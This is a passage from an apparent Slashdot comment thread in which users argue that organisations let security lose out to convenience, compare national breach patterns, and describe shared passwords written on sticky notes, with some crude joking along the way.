I understand that a lot of security solutions are not always convenient, but the level of laziness and disregard for people is really inexcusable. You wanna know the truth? Really easy-to-use security solutions just aren't here yet in a lot of areas. That's a fact. Viruses, worms, system compromises, botnets, identity theft...those ARE here in ALL areas. That's also a fact. If people don't like it then they should go back to using paper records...uh oh...that sounds a little more inconvenient than remembering two passwords, doesn't it?

I realize this comment makes me sound like a security nazi but honestly I am pretty good at bridging the gap and have worked on both sides of the security fence. I am just really really tired of users whining. To a point, yes, usability is very important for a lot of reasons and anywhere possible you should strike a balance between usability and security. I don't discount that. However, in a lot of organizations security ALWAYS loses that battle...ALWAYS. Companies are jumping through incredible hoops to meet regs and appease auditors while willfully engaging in egregious breaches of security in areas not covered by laws.

Re:Security Always Loses (1)

fluffernutter (1411889) | more than 4 years ago | (#29588987)

If I ever wind up working in your workplace, kindly remind me to shoot myself; it will be much easier.

Re:Security Always Loses (1)

endus (698588) | more than 4 years ago | (#29589045)

I don't have a clue who the fuck you are but rest assured that I will remind you of this daily. It really doesn't require any special preparation or remembrance on my part..."god, I wish I could just blow my brains out" is pretty much my mantra.

why assume? (0)

Anonymous Coward | more than 4 years ago | (#29590493)

That the US will be the same as Canada? Or that any other country will be the same as the US?

Cultural, social, economic and many other differences affect how different countries handle IT. It is nonsense to assume that stats in one country mean the same in any other. The UK has LOTS of personal computers in botnets, loses lots of portable media, but hardly any corporate or government hacking. The US has LOTS of corporate hacking but somewhat better controlled personal computers.

In the '70s and '80s the Brits couldn't make a decent car for shit, but the Japanese built great ones. The US cornered the global market on fast food chains. The UK makes the best hi-fis, the French the best wine.

Stop globalising this crap!

Security is like buying Insurance (1)

Phrogman (80473) | more than 4 years ago | (#29596233)

In the sense that while you have it and pay for it, it feels like a waste of time and money, but when you really need it, it's too late if you didn't get it already :P

I am always amazed at the number of places that I have worked that put reasonable security measures in place but then let them be defeated by bad employee practices. The most common would be instances where multiple users share the same password on some machine or application on a machine because it was too difficult to remember the password for multiple people, so they use a common password instead. And the number of places where the password is of course written down on a sticky note stuck to the computer. People view security as a nuisance mostly, and are quite willing to bypass it if it gets in the way of convenience.

We need a better solution than username/password combos, because people are unreliable if something is inconvenient.
